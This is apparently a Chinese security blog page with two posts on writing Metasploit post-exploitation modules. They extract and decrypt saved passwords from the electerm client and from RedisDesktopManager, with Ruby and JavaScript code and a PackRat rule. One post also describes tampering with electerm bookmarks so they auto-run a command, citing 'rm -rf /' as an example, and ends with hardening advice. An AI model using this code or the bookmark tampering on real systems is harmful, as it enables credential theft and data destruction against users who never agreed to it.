编写metasploit模块提取electerm密码

2024-08-07T00:00:00+00:00
继续完善后渗透信息收集的模块，这次的收集对象是https://github.com/electerm/electerm/，一个开源终端/ssh/telnet/serialport/RDP/VNC/sftp客户端。</li> </ul>
安装后打开软件，创建书签，可选类型有ssh，telnet，rdp和vnc协议，也就只有这几个能保存密码的。</li> </ul>
</p>
当时在window系统也安装了，所以直接使用文件监控就知道哪些文件做操作了，最后找到了用户
AppData\Roaming\electerm\users\default_user</code>目录下的一个electerm.bookmarks.nedb</code>文件，打开查看是json格式的文本，下面是格式化后的样例数据，但是里面的密码并不是我当时创建书签所填写的，可以发现是已经加密过的。</li>
</ul>
{
	"_id": "W7oqOeB",
	"title": "",
	"color": "#6a737d",
	"host": "127.0.0.1:22",
	"username": "root",
	"authType": "password",
	"password": "2468:<",
	"port": 22,
	"runScripts": [{}],
	"encode": "utf-8",
	"enableSsh": true,
	"envLang": "en_US.UTF-8",
	"term": "xterm-256color",
	"displayRaw": false,
	"sshTunnels": [],
	"connectionHoppings": [],
	"passwordEncrypted": true
}
</code></pre>

总结一下配置文件的路径，都是在用户的配置文件夹</li>
</ul>
操作系统</th> 书签配置文件路径</th></tr></thead>

window</td> C:\Users\FireEye\AppData\Roaming\electerm\users\default_user\electerm.bookmarks.nedb</td></tr>
linux，osx，unix</td> /home/kali-team/.config/electerm/users/default_user/electerm.bookmarks.nedb</td></tr>
</tbody></table>
</span></a>
解密密码</h1>

由于是开源项目，所以通过查看源码很快就可以得到解密算法，其实就是一个字符位移加密，类似凯撒密码，所以基本上没有达到加密效果</li>
</ul>
https://github.com/electerm/electerm/blob/master/src/app/common/pass-enc.js</a></p>

我们尝试对上面的2468:<</code>密文做解密操作，将javascript直接复制到浏览器控制台回车就得到明文为：123456</code>。</li>
</ul>
"2468:<".split('').map((s, i) => {
    return String.fromCharCode((s.charCodeAt(0) - i - 1 + 65536) % 65536)
  }).join('')
</code></pre>
</p>

当然我们要写的metasploit模块是ruby代码，简单转换一下得到ruby代码为：</li>
</ul>
# Decrypt password https://github.com/electerm/electerm/blob/master/src/app/common/pass-enc.js
def dec_electrm_password(enc)
  result = enc.chars.map.with_index do |s, i|
    ((s.ord - i - 1 + 65536) % 65536).chr
  end.join
  return result
end
</code></pre>
</span></a>
模块编写</h1>

根据不同操作系统获取书签的路径</li>
</ul>
  def get_bookmarks_path
    bookmarks_dir = ''
    case session.platform
    when 'windows'
      app_data = get_env('AppData')
      if app_data.present?
        bookmarks_dir = app_data + '\Roaming\electerm\users\default_user'
      end
    when 'linux', 'osx', 'unix'
      home = get_env('HOME')
      if home.present?
        bookmarks_dir = home + '/.config/electerm/users/default_user'
      end
    end
    bookmarks_path = File.join(bookmarks_dir, 'electerm.bookmarks.nedb')
    return bookmarks_path
  end
</code></pre>

拼接文件名组成完整路径，然后读取文件逐行解析json为字典对象，然后判断是否有密码和是否加密，如果有加密调用解密函数替换密文，返回结果。</li>
</ul>
  def parse_jsonlines(line)
    result_hashmap = Hash.new
    begin
      result_hashmap = JSON.parse(line)
    rescue ::JSON::ParserError => e
      raise Error::ParserError, "[parse_bookmarks] #{e.class} - #{e}"
    end
    if result_hashmap.key?("password")
      if result_hashmap.key?("passwordEncrypted")
        result_hashmap["password"]=dec_electrm_password(result_hashmap["password"])
      end
    end
    return result_hashmap
  end
</code></pre>

最后打印结果，保存信息到数据库，效果如下：</li>
</ul>
</p>
</span></a>
其他攻击思路</h1>

我在创建书签的时候发现了添加运行脚本，双击打开就会自动运行设置好的命令，而这个书签配置文件是可以被任意修改的，并没有对修改的数据做签名校验，也就是其他用户可以绕过工具去修改这个配置文件，而这个工具在重新加载配置文件后信任了被恶意添加的脚本命令。例如下面的一个本地终端：</li>
</ul>
{
	"_id": "GVhcAD-",
	"title": "evil script",
	"runScripts": [{
		"delay": 1,
		"script": "echo kali-team"
	}],
	"color": "#e99695",
	"description": "evil",
	"type": "local",
	"term": "xterm-256color",
	"displayRaw": false
}
</code></pre>

打开后一秒自动执行一条echo命令，试想一下这是一条恶意的命令，比如：rm -rf /</code>，你双击打开一台服务器，输入密码登录上服务器，过了1秒，自动将上面的恶意命令执行了，是不是可以提桶跑路了。</li>
</ul>
</p>
</span></a>
总结</h1>

electron其实内置有很完善的数据加密存储方案，像浏览器一样在window中使用DPAPI</a>加解密，在linux和mac下使用系统密钥环加解密，都可以更加安全得保护用户的凭证信息，就算配置文件被拷到其他电脑也无法被解密，恰恰相反这个工具有一个数据同步功能导致配置文件到任意一台电脑都可以被正常读取解密。如果想要更好的保护数据，最好使用AES加密，密钥由用户设置作为启动主密码，就算将配置文件同步到其他地方泄漏了没有主密码一样无法解密。</li>
还有自动执行脚本命令的功能，需要达到配置文件防篡改，应该对没一个书签配置做签名校验，当这个配置文件不是有软件自身修改的则无法通过签名校验，中断加载配置文件。</li>
</ul>
</span></a>
参考</h1>


https://github.com/rapid7/metasploit-framework/pull/19395</a></p>
</li>

https://www.electronjs.org/docs/latest/api/safe-storage</a></p>
</li>
</ul>


编写Metasploit的PackRat模块获取RDM密码
2022-09-12T00:00:00+00:00
</span></a>
前言</h1>

两年没看过metasploit的代码了，今天在朋友圈看到电视剧《你安全吗》用到了metasploit，所以更新了一下代码，看到之前写的凭证收集的模块都替换为PackRat了。</li>
PackRat是一个后渗透模块，从用户的系统中收集文件和信息的工具。PackRat使用regexp、JSON、XML和SQLite查询搜索和下载感兴趣的文件（如配置文件、接收和删除的电子邮件），并提取信息（如联系人、用户名和密码）。</li>
简单来说就是把信息收集写成像nuclei那样使用规则去获取，这样就不用写代码了。</li>
</ul>
</span></a>
环境搭建</h1>

找了一个简单的软件作为例子，Redis的图形化客户端https://github.com/uglide/RedisDesktopManager</li>
redis服务器搭建，连上去设置密码为：my_redis</code>。</li>
</ul>
☁  ~  docker run -it -p 6379:6379 redis:latest
root@082845d25224:/bin# redis-cli -h 127.0.0.1 -p 6379 
127.0.0.1:6379> keys * 
(empty array)
127.0.0.1:6379> config get requirepass
1) "requirepass"
2) ""
127.0.0.1:6379> config set requirepass my_redis
OK
127.0.0.1:6379> config get requirepass
1) "requirepass"
2) "my_redis"
</code></pre>
</p>

配置文件：C:\Users\FireEye\.rdm\connections.json</code></li>
</ul>
[
    {
        "auth": "my_redis",
        "cluster_host_override": true,
        "db_scan_limit": 20,
        "host": "10.168.1.201",
        "keys_pattern": "*",
        "name": "T",
        "namespace_separator": ":",
        "port": 6379,
        "ssh_agent_path": "",
        "ssh_password": "",
        "ssh_private_key_path": "",
        "ssl_ignore_all_errors": false,
        "timeout_connect": 60000,
        "timeout_execute": 60000,
        "username": "A" //这个是我加上去测试的
    }
]
</code></pre>
</span></a>
编写PackRat规则</h2>

首先ProfileDir</code>这个是userprofile中的键，详细可以看我写的模块编写文章中的获取用户配置，调试看到就是这样的：</li>
</ul>
[1] pry(#<Msf::Modules::Post__Windows__Gather__Credentials__Rdm::MetasploitModule>)> userprofile                                                               
=> {"SID"=>"S-1-5-21-1546888072-418879536-4029880489-1001",                                                                                                    
 "ProfileDir"=>"C:\\Users\\FireEye",                                                                                                                           
 "AppData"=>"C:\\Users\\FireEye\\AppData\\Roaming",                                                                                                            
 "LocalAppData"=>"C:\\Users\\FireEye\\AppData\\Local",                                                                                                         
 "LocalSettings"=>nil,                                                                                                                                         
 "Desktop"=>"C:\\Users\\FireEye\\Desktop",                                                                                                                     
 "MyDocs"=>"C:\\Users\\FireEye\\Documents",                                                                                                                    
 "Favorites"=>"C:\\Users\\FireEye\\Favorites",                                                                                                                 
 "History"=>"C:\\Users\\FireEye\\AppData\\Local\\Microsoft\\Windows\\History",                                                                                 
 "Cookies"=>"C:\\Users\\FireEye\\AppData\\Roaming\\Microsoft\\Windows\\Cookies",                                                                               
 "Temp"=>"C:\\Users\\FireEye\\AppData\\Local\\Temp\x00",                                                                                                       
 "Path"=>                                                                                                                                                      
  "C:\\Users\\FireEye\\scoop\\apps\\openjdk\\current\\bin;C:\\Users\\FireEye\\scoop\\apps\\yarn\\current\\global\\node_modules\\.bin;C:\\Users\\FireEye\\scoop\
\apps\\yarn\\current\\Yarn\\bin;C:\\Users\\FireEye\\scoop\\apps\\nodejs\\current\\bin;C:\\Users\\FireEye\\scoop\\apps\\nodejs\\current;C:\\Users\\FireEye\\scoo
p\\apps\\python\\current\\Scripts;C:\\Users\\FireEye\\scoop\\apps\\python\\current;C:\\Users\\FireEye\\go\\bin;C:\\Users\\FireEye\\scoop\\apps\\gcc\\current\\b
in;C:\\Users\\FireEye\\scoop\\apps\\openssl\\current\\bin;C:\\Users\\FireEye\\scoop\\shims;C:\\Users\\FireEye\\AppData\\Roaming\\Python\\Python39\\Scripts;C:\\
Users\\FireEye\\AppData\\Roaming\\npm;C:\\Program Files\\Azure Data Studio\\bin\x00",                                                                          
 "UserName"=>"FireEye",                                                                                                                                        
 "Domain"=>"WIN-79MR8QJM50N"}
</code></pre>

所以呢可以通过这里的键快速找到用户对应的路径。</li>
</ul>
{
      application: 'redis_desktop_manager',
      app_category: 'redis',
      gatherable_artifacts: [
        {
          filetypes: 'logins',
          path: 'ProfileDir',//上面说的用户路径
          dir: '.rdm', //软件配置文件夹
          artifact_file_name: 'connections.json',//保存了密码的文件
          description: "RedisDesktopManager's saved Username and Password ",
          credential_type: 'json',
          json_search: [
            {
              json_parent: "",
              json_children: [// 要提取的键
                "['name']",
                "['username']",
                "['auth']",
                "['host']",
                "['port']",
              ]
            }
          ]
        }
      ]
    }
</code></pre>

运行效果</li>
</ul>
</p>
</span></a>
参考</h2>
https://github.com/rapid7/metasploit-framework/pull/17006</a></p>
Kali-Team - electerm

编写metasploit模块提取electerm密码

编写Metasploit的PackRat模块获取RDM密码

</span></a> 环境搭建</h1> 找了一个简单的软件作为例子，Redis的图形化客户端https://github.com/uglide/RedisDesktopManager</li>

</span></a> 参考</h2> https://github.com/rapid7/metasploit-framework/pull/17006</a></p>

https://github.com/rapid7/metasploit-framework/pull/17006</a></p>
